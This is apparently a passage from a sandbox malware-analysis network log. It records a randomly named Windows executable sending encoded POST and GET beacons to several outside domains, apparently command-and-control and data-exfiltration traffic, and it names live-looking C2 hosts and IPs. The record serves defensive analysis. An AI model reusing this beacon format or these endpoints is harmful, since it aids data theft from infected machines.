                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.questmatch.pro
                                                                                                            Referer: http://www.questmatch.pro/1yxc/
                                                                                                            Content-Length: 3623
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
Dec 12, 2024 10:20:37.427007914 CET | 1764 | OUT
Dec 12, 2024 10:20:38.560563087 CET | 1236 | IN | HTTP/1.1 404
                                                                                                            Date: Thu, 12 Dec 2024 09:20:38 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Origin
                                                                                                            Vary: Access-Control-Request-Method
                                                                                                            Vary: Access-Control-Request-Headers
                                                                                                            X-Correlation-ID: 5cdc8d0f-e68a-4f17-9b44-f9936aec3b03
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: 0
                                                                                                            CF-Connecting-IP: 8.46.123.175
                                                                                                            CF-IPCountry: US
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cvuMPJVdA0PMZE7sxSKPB9FHSpcdqZadxGbuzrlJfIr99MWvgyrur9g%2BHCi44UXXpjFxt6D10yY8XZlk678Dh7eZoKdcmLdo7ltubzCaKnqxRe05oojZTmVdU3RLGnnbgvutwvg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f0ca3bedd48426b-EWR
                                                                                                            Content-Encoding: gzip
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1735&min_rtt=1735&rtt_var=867&sent=3&recv=6&lost=0&retrans=0&sent_bytes=0&recv_bytes=4236&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Dec 12, 2024 10:20:38.560585976 CET | 101 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.22 | 49170 | 188.114.97.6 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 10:20:40.044104099 CET | 543 | OUT | GET /1yxc/?x4=sNv20zOiDYMkOMIZUAMTdfOFf2lUUMo2G3KMZ1n3ZrvJqNyjokS5weFlZhKtUuMXj8jBQ4ipfeoXnmxfx9jFO8nPHTBXwG0erHwEdD0EmkjwsdzIUyNTuEGbdIq/&e2E=wRQ8oHXx HTTP/1.1
                                                                                                            Host: www.questmatch.pro
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
Dec 12, 2024 10:20:41.230292082 CET | 1236 | IN | HTTP/1.1 404
                                                                                                            Date: Thu, 12 Dec 2024 09:20:41 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Origin
                                                                                                            Vary: Access-Control-Request-Method
                                                                                                            Vary: Access-Control-Request-Headers
                                                                                                            X-Correlation-ID: 78068bbf-3dab-4d17-b579-445b85c3861f
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: 0
                                                                                                            CF-Connecting-IP: 8.46.123.175
                                                                                                            CF-IPCountry: US
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v5besRcxkG6ivF0dRpiwlkdT3yE7PIvIFJJt3qrLXyicQEqcXXnfz6go%2FhbosMrgJDK0pfbOf22b3dE4x8J4hyz7c4q4O04if2fvLznkhWRWQjUP6zB%2B%2FwXYt%2F4OFWrLKnHGXG4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f0ca3cf8d030cb4-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1596&min_rtt=1596&rtt_var=798&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=543&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Data Ascii: bb{"body":null,"errors":{"code":404,"name":"Not Found","details":["No handler found for GET /1yxc/"]},"debug
Dec 12, 2024 10:20:41.230309963 CET | 88 | IN | Data Ascii: Info":{"correlationId":"78068bbf-3dab-4d17-b579-445b85c3861f","stackTrace":null}}0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.22 | 49171 | 85.25.177.138 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 10:20:47.008343935 CET | 2472 | OUT | POST /7mvy/ HTTP/1.1
                                                                                                            Host: www.mrpokrovskii.pro
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.mrpokrovskii.pro
                                                                                                            Referer: http://www.mrpokrovskii.pro/7mvy/
                                                                                                            Content-Length: 2159
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
Dec 12, 2024 10:20:47.127778053 CET | 306 | OUT
Dec 12, 2024 10:20:48.270581007 CET | 462 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                            Date: Thu, 12 Dec 2024 09:20:48 GMT
                                                                                                            Server: Apache/2
                                                                                                            Location: https://www.mrpokrovskii.pro/7mvy/
                                                                                                            Content-Length: 242
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.mrpokrovskii.pro/7mvy/">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.22 | 49172 | 85.25.177.138 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 10:20:49.667020082 CET | 817 | OUT | POST /7mvy/ HTTP/1.1
                                                                                                            Host: www.mrpokrovskii.pro
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.mrpokrovskii.pro
                                                                                                            Referer: http://www.mrpokrovskii.pro/7mvy/
                                                                                                            Content-Length: 199
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Data Ascii: x4=s4z0josg0gQQ9U+QfZLeZMWBKr0BbMg0H5WJMuerZEz/0wiFV3/WUeGAmTfqwj2Tv+bBxWCT1Z58WYoGyXHULD3goTARgyDNXu7bcrezRggYNEWCg/hwlq8VA4byaGM7xzX0ZFCjjHIjP0QM/5NfFwMBwWRKEtlZtmK1XAqzWNH4TmPErzidxI26JT59C6f92w==
Dec 12, 2024 10:20:50.939935923 CET | 462 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                            Date: Thu, 12 Dec 2024 09:20:50 GMT
                                                                                                            Server: Apache/2
                                                                                                            Location: https://www.mrpokrovskii.pro/7mvy/
                                                                                                            Content-Length: 242
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.mrpokrovskii.pro/7mvy/">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.22 | 49173 | 85.25.177.138 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 10:20:52.320725918 CET | 2472 | OUT | POST /7mvy/ HTTP/1.1
                                                                                                            Host: www.mrpokrovskii.pro
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.mrpokrovskii.pro
                                                                                                            Referer: http://www.mrpokrovskii.pro/7mvy/
                                                                                                            Content-Length: 3623
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
Dec 12, 2024 10:20:52.440634012 CET | 1770 | OUT
                                                                                                            Data Ascii: Dqyq4S2rxVo/2QscEgwL8Lg8LCA4ZGpouhdqm/OHgi/p4P5oAieiCXPrz+MCxyQ0zgQxzLK7/yM/wmtk9JlPzhVZyeisKSDAJiFfZYXVE/sOsFv/KBPLGacobS+qz7gDAWDYHAj+TnZTZqIM2C2oW1bTNDBuwsqHa9dhEnSUA6Rzric1Hpb5CEt8i6/xVAVDjAB/RRbpZiZHRv3ouePRtIXeGnR8owFCSfjLwMYH/p8vEP1G2g+
Dec 12, 2024 10:20:53.691487074 CET | 462 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                            Date: Thu, 12 Dec 2024 09:20:53 GMT
                                                                                                            Server: Apache/2
                                                                                                            Location: https://www.mrpokrovskii.pro/7mvy/
                                                                                                            Content-Length: 242
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.mrpokrovskii.pro/7mvy/">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.22 | 49174 | 85.25.177.138 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 10:20:54.975557089 CET | 545 | OUT | GET /7mvy/?x4=h6bUgYM5oQIom3SELeChVOWhI9VWPZg3BKiCH+SaZEqPzQm7dEGcSvaBjSz44Tn+gLzjg3KkouZfQr0KlXeCQD7BohQrjjLoRt3TUvjzHSULJDbynuVmorsgWcKo&e2E=wRQ8oHXx HTTP/1.1
                                                                                                            Host: www.mrpokrovskii.pro
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
Dec 12, 2024 10:20:56.247915983 CET | 748 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                            Date: Thu, 12 Dec 2024 09:20:56 GMT
                                                                                                            Server: Apache/2
                                                                                                            Location: https://www.mrpokrovskii.pro/7mvy/?x4=h6bUgYM5oQIom3SELeChVOWhI9VWPZg3BKiCH+SaZEqPzQm7dEGcSvaBjSz44Tn+gLzjg3KkouZfQr0KlXeCQD7BohQrjjLoRt3TUvjzHSULJDbynuVmorsgWcKo&e2E=wRQ8oHXx
                                                                                                            Content-Length: 387
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.mrpokrovskii.pro/7mvy/?x4=h6bUgYM5oQIom3SELeChVOWhI9VWPZg3BKiCH+SaZEqPzQm7dEGcSvaBjSz44Tn+gLzjg3KkouZfQr0KlXeCQD7BohQrjjLoRt3TUvjzHSULJDbynuVmorsgWcKo&amp;e2E=wRQ8oHXx">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.22 | 49175 | 173.236.199.97 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 10:21:29.188191891 CET | 2472 | OUT | POST /zu0o/ HTTP/1.1
                                                                                                            Host: www.kvsj.net
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.kvsj.net
                                                                                                            Referer: http://www.kvsj.net/zu0o/
                                                                                                            Content-Length: 2159
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
Dec 12, 2024 10:21:29.308577061 CET | 282 | OUT
                                                                                                            Data Ascii: qlTiRtNhPJmmcNkR0J0LhCbL38T6aZYdZVrJEFnAQFWAFLVRAZUCUBGQALNUVm+KVdWAZu4gt72sAINIubJhbuDbvhmYNFjNIOKIxA6vSjZWw+YA4OSh/VNr0uQREN08javtJ3p0joB3fSkumghhnyD7w7jzJWsXaB6Y/j9jfF8bMXZN1YSyqqMLj7VjyiybTBoYvdPdnmFeGYrWNESYdfDG0b7BLgn8dUaJ74B8cEgw2nvWuSD
Dec 12, 2024 10:21:30.290648937 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                            Date: Thu, 12 Dec 2024 09:21:30 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 315
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.22 | 49176 | 173.236.199.97 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 10:21:31.849853039 CET | 793 | OUT | POST /zu0o/ HTTP/1.1
                                                                                                            Host: www.kvsj.net
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.kvsj.net
                                                                                                            Referer: http://www.kvsj.net/zu0o/
                                                                                                            Content-Length: 199
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Data Ascii: x4=W87YeBucGxwNEcAo7aqssv23KIcdhh5dfNs3nYAExNjGOv5TRq7i4rD26d5QjSAaCuj8OIywMTWHYxEAKedZGtQZRF6Z30voUa0RyhzXNJ8zJo+d1tUApqmfkGs6rAvT9uWhy5nEdhMTUerCCrHJPUdsFrgch0uNkpB+8vYicD06CGculgd9dmHYBgjRhWuwHg==
Dec 12, 2024 10:21:32.950170994 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                            Date: Thu, 12 Dec 2024 09:21:32 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 315
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.22 | 49177 | 173.236.199.97 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 10:21:34.502125978 CET | 2472 | OUT | POST /zu0o/ HTTP/1.1
                                                                                                            Host: www.kvsj.net
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.kvsj.net
                                                                                                            Referer: http://www.kvsj.net/zu0o/
                                                                                                            Content-Length: 3623
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
Dec 12, 2024 10:21:34.621628046 CET | 1746 | OUT
                                                                                                            Data Ascii: SlQCRqIRPQmmcXkRcB0LNsbIv8TZiZfrRV0pEDnAREYgJuVRAjUCgBGQQLNXtm+6VaaQZt9gt4t8AuNIuhJjvQDYjhmL5Fn8IOJ4x8zPTndWsVYA8CSk7rN4wuRjMNm+ba8dJ6hUjlB3T6ku3Phg3YDpY7iDJWmEyCrI/h4jfY8bMvZNNcS3S6MPn7VhqizrTGiIvhMdnKFeK9rWEVSZtfDCkb7hbg28dUSp79fMdFvQ6kvW+LT
Dec 12, 2024 10:21:35.595786095 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                            Date: Thu, 12 Dec 2024 09:21:35 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 315
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.22 | 49178 | 173.236.199.97 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 10:21:37.157578945 CET | 537 | OUT | GET /zu0o/?x4=b+T4d2yBdzwUctMejPOupP2kAcsd/nhPUeEaq4sP5cuMDP5lcr7xps31yZ0v/SBMA/DffJ2wWiPafQM+LvQwNtI7bwedqUnBbu8V9j+TNLUtBYOc7+oiqpinqR9T&e2E=wRQ8oHXx HTTP/1.1
                                                                                                            Host: www.kvsj.net
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
Dec 12, 2024 10:21:38.255367994 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                            Date: Thu, 12 Dec 2024 09:21:38 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 315
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.22 | 49179 | 203.161.42.73 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 10:21:43.769907951 CET | 2472 | OUT | POST /n8su/ HTTP/1.1
                                                                                                            Host: www.learniit.info
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.learniit.info
                                                                                                            Referer: http://www.learniit.info/n8su/
                                                                                                            Content-Length: 2159
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
Dec 12, 2024 10:21:44.996331930 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                            Date: Thu, 12 Dec 2024 09:21:44 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 16052
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.22 | 49180 | 203.161.42.73 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 10:21:46.426131964 CET | 808 | OUT | POST /n8su/ HTTP/1.1
                                                                                                            Host: www.learniit.info
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.learniit.info
                                                                                                            Referer: http://www.learniit.info/n8su/
                                                                                                            Content-Length: 199
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
Dec 12, 2024 10:21:47.642015934 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                            Date: Thu, 12 Dec 2024 09:21:47 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 16052
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html
                                                                                                            Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"
                                                                                                            Dec 12, 2024 10:21:47.763082981 CET1236INData Raw: 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31
                                                                                                            Data Ascii: one;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.59463,27.24606


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.22 | 49181 | 203.161.42.73 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 10:21:49.089282036 CET | 2472 | OUT | POST /n8su/ HTTP/1.1
    Host: www.learniit.info
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate, br
    Origin: http://www.learniit.info
    Referer: http://www.learniit.info/n8su/
    Content-Length: 3623
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Cache-Control: max-age=0
    User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
Dec 12, 2024 10:21:50.341052055 CET | 1236 | IN | HTTP/1.1 404 Not Found
    Date: Thu, 12 Dec 2024 09:21:50 GMT
    Server: Apache
    Content-Length: 16052
    Connection: close
    Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.22 | 49182 | 203.161.42.73 | 80 | 1020 | C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 10:21:51.741799116 CET | 542 | OUT | GET /n8su/?e2E=wRQ8oHXx&x4=lFR6PBva/PMsONRXI0WwK0wAlPs3/3LGo4dEt9E07rmpJDSADrt1oQ5wEpxa5wprSOBn2CzJO8jS1Mfo/039O8MFhYDOYZlyw2UFRkURX7D2yJawivbRUB3rqqzd HTTP/1.1
    Host: www.learniit.info
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
Dec 12, 2024 10:21:52.962450981 CET | 1236 | IN | HTTP/1.1 404 Not Found
    Date: Thu, 12 Dec 2024 09:21:52 GMT
    Server: Apache
    Content-Length: 16052
    Connection: close
    Content-Type: text/html; charset=utf-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
